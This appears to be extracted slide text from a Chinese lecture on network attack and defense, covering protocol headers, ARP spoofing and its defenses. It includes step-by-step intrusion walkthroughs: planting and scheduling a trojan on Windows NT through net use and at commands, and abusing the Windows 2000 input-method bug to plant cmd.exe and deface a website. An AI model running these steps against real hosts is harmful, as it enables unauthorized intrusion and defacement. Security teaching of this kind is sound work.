网络攻击与防御-第一讲

1、 网络攻击与防御本节提要1.网络安全概述2.一个网络安全有关的案例3.与网络安全有关的协议网络安全概述网络安全定义指网络系统的硬件、软件及系统中的数据受到保护，不会遭受恶意的破坏、更改和泄漏，系统可以正常的运行网络安全概述什么是不安全的网络环境信息丢失信息战内部泄密外部泄密自然灾害、意外事故计算机犯罪网络协议中的缺陷，例如TCP/IP协议的缺陷电子谍报，比如信息流量分析、信息窃取等人为行为，比如使用不当，安全意识差等“黑客” 行为，比如非法访问、非法连接一个关于网络安全的实例一次迅速入侵NT架构操作系统的方法操作系统平台：必须为NT，可以是WINNT4.0或5.0；WorkStation 或S

2、erver；还可以是WIN2000。工具:Netsvc.exe 用于启动远程主机的schedule服务。1.打开DOS窗口，输入net use ip 连接上目标主机。把木马上传到目标主机。建议放在你共享的所在目录，或系统目录WINNT下,执行时不用再输入程序所在路径。木马都有自我删除功能，所以一般不会被管理员发现。上传木马后，键入:C:/netsvc ip schedule /start启动目标主机的schedule服务(schedule服务用来定时执行某程序，我们可利用它来执行木马程序)。这过程可能会持续较久,一定要等到提示符出现才进行下一步,然后键入C:/net time ip将显示目标主

3、机的系统时间，如：14:43记住这时间，接下来用AT命令往目标主机添加入定时启动木马程序的任务，键入：C:/at ip 14:45 trojan.exe注意：这里我启动时间定为14:45而不是14:43，往后推迟了几分钟，这是考虑到命令往返于两机需要一定的时间至此，你只要等稍等几分钟过去，就可以打开你的木马客户器控制目标主机了，也不用那么麻烦地执行程序啦！入侵分析这次入侵使用了一些DOS系统中的常用命令例如net use ipC:/netsvc ip schedule /startC:/net time ipC:/at ip 14:45 trojan.exe使用了木马程序Netsvc.exe学

4、习网络攻击与防御我们需要哪些知识1.对操作系统的理解2.对网络框架与协议的理解3.常用网络命令的掌握4.掌握通过工具捕获网络信息的方法5.对捕获的网络信息有分析能力6.掌握路由器与交换机的工作原理与配置方法7.会设置防火墙操作系统介绍常用操作系统的架构介绍一.基于windowsNT架构系统Windows2000server系统特点：1.支持NTFS格式系统文件2. win2000系统支持127位的字符口令3. Active Directory 与 Windows 2000 安全服务（如 Kerberos 身份验证协议、公钥基本结构、加密文件系统 (EFS)、安全性配置管理器、组策略以及委派管理

5、等）紧密集成。说明1.什么是NTFS(New Technology File System) 微软WindowsNT内核的系列操作系统支持的、一个特别为网络和磁盘配额、文件加密等管理安全特性设计的磁盘格式。随着以NT为内核的 Windows2000/XP的普及，很多个人用户开始用到了NTFS。NTFS也是以簇为单位来存储数据文件，但NTFS中簇的大小并不依赖于磁盘或 分区的大小。簇尺寸的缩小不但降低了磁盘空间的浪费，还减少了产生磁盘碎片的可能。NTFS支持文件加密管理功能，可为用户提供更高层次的安全保证。 说明Active Directory是指Windows 2000网络中的目录服务。它有两

6、个作用： 1. 目录服务功能2.集中式管理 该技术还可以用来确保只有那些经过授权的用户或应用程序方可获准在具备安全保障的前提自下针对相关资源实施访问调用。 Unix系统架构介绍UNIX ，是一个强大的多用户、多任务操作系统，支持多种处理器架构 unix是基于命令行的操作系统 Unix操作系统通常被分成三个主要部分：内核（Kernel）、Shell和文件系统。 Unix系统权限介绍1.读许可权2.写许可权3.执行许可权Unix基本命令操作举例（1）首先让我们在当前目录下创建两个目录dir1，dir2： mkdir dir1 dir2 /输入命令后记得敲一下回车键： （2）进入目录dir1中创建文

7、件file1，file2： cd dir1 /进入目录dir1 touch file1 file2 /创建文件file1，file2 （3）再进入目录dir2中创建文件file3，file4： cd . /返回上一级目录 cd dir2 /进入目录dir2 touch file3 file4 /创建文件file3，file4 与DOS命令有些相似Unix常用操作界面网络安全概述网络安全定义指网络系统的硬件、软件及系统中的数据受到保护，不会遭受恶意的破坏、更改和泄漏，系统可以正常的运行远程攻击与防御基础介绍Host C 入侵检测 控制台 Host B Host A 受保护网络IDS主机黑客发起攻

8、击验证报文并采取措施识别出攻击行为阻断连接或者报警等发现响应策略InternetInternet返回一次远程攻击与防御示意图分析攻击的位置远程攻击本地攻击伪远程攻击简单拒绝服务本地用户非法获得权限远程用户非法获得权限攻击分类主动攻击被动攻击常见攻击手段窃听（键击记录、网络监听）欺骗（获取口令、恶意代码）拒绝服务（资源耗尽）数据驱动攻击（缓冲区溢出、漏洞攻击）网络防御系统体系结构预警保护检测响应恢复反击网络安全通信协议总部分支机构移动用户 INTERNET安全整体解决方案客户端防病毒与客户端VPN软件入侵检测与服务器防病毒防火墙或VPN网关网络协议的进一步讨论Tcp/Ip协议分析TCP协议报头格

9、式分析通过网络分析仪捕获的协议实例Tcp数据段如下Source port:5973 /源端口Destination port:23 /目的端口Sequence number:1456389907 /序列号Ack number:1242056456 /确认号Offset:5 /报头长度Reserved: %000000 /保留Code: %011000 /代码位Ack is valid Push request Window: 61320 /窗口Checksum: 0 x61a6 /校验和Urgent pointer: 0 / 紧急指针No tcp options /选项Tcp data are

10、a: /数据Vl.5.+.5.+.5. 76 4c 19 35 11 2b 19Frame check sequence:0 x0d0000f网络协议的进一步讨论Tcp/Ip协议分析Ip协议报头格式网络协议的进一步讨论分析：版本 ：ip版本号首部长度：32位长度服务类型：说明数据如何被处理长度：报头与数据的长度认证：唯一的ip数据包值标志：说明是否有数据被分片段偏移量：数据在装入时太大，需要进行分段与重组TTL: 是指一个数据包被发送时规定的一个时间值协议：上层协议端口，tcp是6H，UDP是17H校验和：检测报头的循环冗余码源地址：发送站的32位地址目的地址：接收站的32位地址选项：用于网络

11、调试，检测通过网络分析仪捕获的协议实例IP Header - Internet Protocol Datagram Version: 4 / 版本号 Header Length: 5 /首部长度 Precedence: 0 /优先级 Type of Service: %000 服务类型 Unused: %00 未使用 Total Length: 187 总长度 Identifier: 22486 认证 Fragmentation Flags: %010 Do Not Fragment /是否有分片（碎片） Fragment Offset: 0 / 段开销 Time To Live: 60 /生

12、存周期 IP Type: 0 x06 TCP / 协议 此处表示6H TCP Header Checksem: 0 xd031 /报头校验 Source IP Address: 0 Dest. IP Address: 0 No Internet Datagram Options /无选项 在ip协议字段可能出现的协议号协议 协议号ICMP 1IGRP 9EIGRP 88OSPF 89IPV6 41GRE 47 UDP协议网络协议的进一步讨论源端口 ：发送数据主机的端口号目的端口 ：目的主机上请求应用程序的端口号长度： udp报头与udp数据的长度校验和: 报头与数据字段两者的校验和数据：上层的

13、数据通过网络分析仪捕获的协议实例UDP - User Datagram Protocol Source Port: 1085 /源端口 Destination Port: 5136 /目的端口 Length: 41 /长度 Checksum: 0 x7a3c /校验 UDP Data Area: .Z. 00 01 5a 96 00 01 00 00 00 00 00 11 00 00 00.C.2._C._C 2e 03 00 43 02 1e 32 0a 00 0a 00 80 43 00 80Frame Check Sequence: 0 x00000000关于端口的讨论&传输层的协议讨

14、论端口：tcp与UDP必须使用端口号来与其他上层进行通信不同的端口号实现了不同的会话过程在应用层中对应的不同端口号应用层 传输层协议 端口号FTP TCP 21TELNET TCP 23 DNS TCP/UDP 53TFTP UDP 69POP3 UDP 110低于1024的端口号有rfc3232确定高于1024的端口号及1024端口号被上层用来建立主机与其他主机的会话传输层上TCP与UDP协议的比较TCP关键字(排序、可靠、面向连接、虚电路、三方握手、窗口流量控制)、UDP关键字(无序、不可靠、无连接、低开销、无确认、没有窗口或流量控制) 一次利用端口与windows2000漏洞进行攻击的实

15、例攻击目的：侵入安装windows2000网络服务器的主机，获得网站资料并篡改网页内容攻击步骤：利用WINDOW输入法漏洞1、用端口扫瞄程序扫IP的3389端口，得到xx.xx.xx.xx。 2、运行windows2000终端客户程序，在服务器输入框里填入：xx.xx.xx.xx ，连接。 3、出现windows2000的登陆窗口，按下CTRL+SHIFT键，出现全拼输入法。一次利用端口与windows2000漏洞进行攻击的实例4、在输入法状态条上按mouse右键，选择帮助，选择输入指南，选择选项按右键。 5、选择跳转到URL，输入：c:winntsystem32cmd.exe. 6、选择保存

16、到磁盘。 7、选择目录：c:inetpubscripts 8、打开IE，输入：xx.xx.xx.xx/scripts/cmd.exe?/c+dir+c: （知道了吧） 9、输入：xx.xx.xx.xx/scripts/cmd.exe?/c+echo+BEIJING+c:inetpubwwwrootdefault.aspARP协议与RARP协议的进一步讨论地址解析协议ARP概述图例：通过网络分析仪捕获的协议实例Packet Length: 64 Timestamp: 09:17:29 03/17/10Ethernet Header Destination: FF:FF:FF:FF:FF:FF /

17、这是一个广播地址 Source: 00:A0:24:48:60:A5 Protocol Type: 0 x0806 IP ARPARP - Address Resolution Protocol Hardware: 1 Ethernet (10Mb) Protocol: 0 x0800 IP Hardware Address Length: 6 Protocol Address Length: 4 Operation: 1 ARP Request Sender Hardware Address: 00:A0:24:48:60:A5 Sender Internet Address: Target

18、 Hardware Address: 00:00:00:00:00:00 (ignored) Target Internet Address: 0ARP就是已知主机的IP地址在网络上查找到它的MAC地址的协议一次利用ARP协议的攻击ARP欺骗原理 每台安装有TCP/IP协议的电脑里都有一个ARP缓存表，表里的IP地址与MAC地址是一一对应的，如下表所示。主机 IP地址 MAC地址A aa-aa-aa-aa-aa-aaB bb-bb-bb-bb-bb-bbC cc-cc-cc-cc-cc-ccD dd-dd-dd-dd-dd-dd一次利用ARP协议的攻击ARP协议的基础就是信任局域网内所有的人，

19、那么就很容易实现在以太网上的ARP欺骗。对目标A进行欺骗，A去Ping主机C却发送到了DD-DD- DD-DD-DD-DD这个地址上。如果进行欺骗的时候，把C的MAC地址骗为DD-DD-DD-DD-DD-DD，于是A发送到C上的数据包都变成发送 给D的了。这不正好是D能够接收到A发送的数据包了么。 如何防范ARP攻击ARP攻击后的症状ARP的发现：ARP的通病就是掉线，在掉线的基础上可以通过以下几种方式判 别，1.一般情况下不需要处理1分钟之内就可以回复正常上网。因为ARP欺骗是由时限，过了期限就会自动的回复正常。而且现在大多数路由器都会在很短时间 内不停广播自己的正确ARP，使受骗的机器回复

20、正常。但是如果出现攻击性ARP欺骗（其实就是时间很短的量很大的欺骗ARP，1秒有个几百上千的），他是 不断的通过非常大量ARP欺骗来阻止内网机器上网，即使路由器不断广播正确的包也会被他大量的错误信息给淹没。2.打开被骗机器的DOS界面，输入ARP -A命令会看到相关的ARP表，通过看到的网关的MAC地址可以去判别是否出现ARP欺骗，但是由于时限性，这个工作必须在机器回复正常之前完成。如果出 现欺骗问题，ARP表里面会出现错误的网关MAC地址，和真实的网关MAC进行对比如何防范ARP攻击1. 在PC上绑定路由器的IP和MAC地址：1)首先，获得路由器的内网的MAC地址(例如HiPER网关地址54

21、的MAC地址为0022aa0022aa局域网 端口MAC地址)。2)编写一个批处理文件rarp.bat内容如下：echo offarp -darp -s 54 00-22-aa-00-22-aa将文件中的网关IP地址和MAC地址更改为您自己的网关IP地址和MAC地址即可。将这个批处理软件拖到“windows-开始-程序-启动”中。2. 在路由器上绑定用户主机的IP和MAC地址(440以后的路由器软件版本支持) ICMP协议的讨论该协议工作在网络层属于一个管理型协议icmp（因特网控制报文协议）协议负责为IP提供路由信息与有无差错情况典型应用ping该协议使用ip协议进行封装通过网络分析仪捕获的协议实例捕获完整的协议数据内容Flags: 0 x00 Status: 0 x00 Packet Length: 78 Timestamp: 14:04:25.967000 12/20/03 Ethernet Header Destination: 00:a0:24:6e:0f:a8 Source: 00:80:c7:a8:f0:3d Ether-Type: 08-00 IP通过网络分析仪捕获的协议实例IP Header - Internet Protocol Datgram Versio